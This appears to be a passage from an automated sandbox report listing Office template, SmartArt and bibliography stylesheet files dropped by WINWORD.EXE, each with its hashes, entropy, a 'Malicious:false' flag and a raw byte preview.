                                                SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF16A.tmp\Equations.dotx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):51826
                                                Entropy (8bit):5.541375256745271
                                                Encrypted:false
                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                Malicious:false
                                                Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                C:\Users\user\AppData\Local\Temp\TCDF18A.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):252
                                                Entropy (8bit):3.4680595384446202
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF18A.tmp\architecture.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):5783
                                                Entropy (8bit):7.88616857639663
                                                Encrypted:false
                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                Malicious:false
                                                Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                C:\Users\user\AppData\Local\Temp\TCDF18B.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):332
                                                Entropy (8bit):3.547857457374301
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF18B.tmp\harvardanglia2008officeonline.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):284415
                                                Entropy (8bit):5.00549404077789
                                                Encrypted:false
                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                MD5:33A829B4893044E1851725F4DAF20271
                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                C:\Users\user\AppData\Local\Temp\TCDF1AC.tmp\Banded.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):562113
                                                Entropy (8bit):7.67409707491542
                                                Encrypted:false
                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                Malicious:false
                                                Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Local\Temp\TCDF1AC.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):278
                                                Entropy (8bit):3.535736910133401
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF1DC.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):274
                                                Entropy (8bit):3.438490642908344
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                MD5:0F98498818DC28E82597356E2650773C
                                                SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF1DC.tmp\Element design set.dotx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):34415
                                                Entropy (8bit):7.352974342178997
                                                Encrypted:false
                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                Malicious:false
                                                Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                C:\Users\user\AppData\Local\Temp\TCDF1DD.tmp\CircleProcess.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):16806
                                                Entropy (8bit):7.9519793977093505
                                                Encrypted:false
                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                C:\Users\user\AppData\Local\Temp\TCDF1DD.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):254
                                                Entropy (8bit):3.4720677950594836
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF1EE.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):242
                                                Entropy (8bit):3.4938093034530917
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF1EE.tmp\TabList.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):4888
                                                Entropy (8bit):7.8636569313247335
                                                Encrypted:false
                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                Malicious:false
                                                Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                C:\Users\user\AppData\Local\Temp\TCDF1EF.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):286
                                                Entropy (8bit):3.5502940710609354
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF1EF.tmp\iso690.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):270198
                                                Entropy (8bit):5.073814698282113
                                                Encrypted:false
                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Local\Temp\TCDF20F.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):254
                                                Entropy (8bit):3.4721586910685547
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                MD5:4DD225E2A305B50AF39084CE568B8110
                                                SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF20F.tmp\chevronaccent.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):4243
                                                Entropy (8bit):7.824383764848892
                                                Encrypted:false
                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                Malicious:false
                                                Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

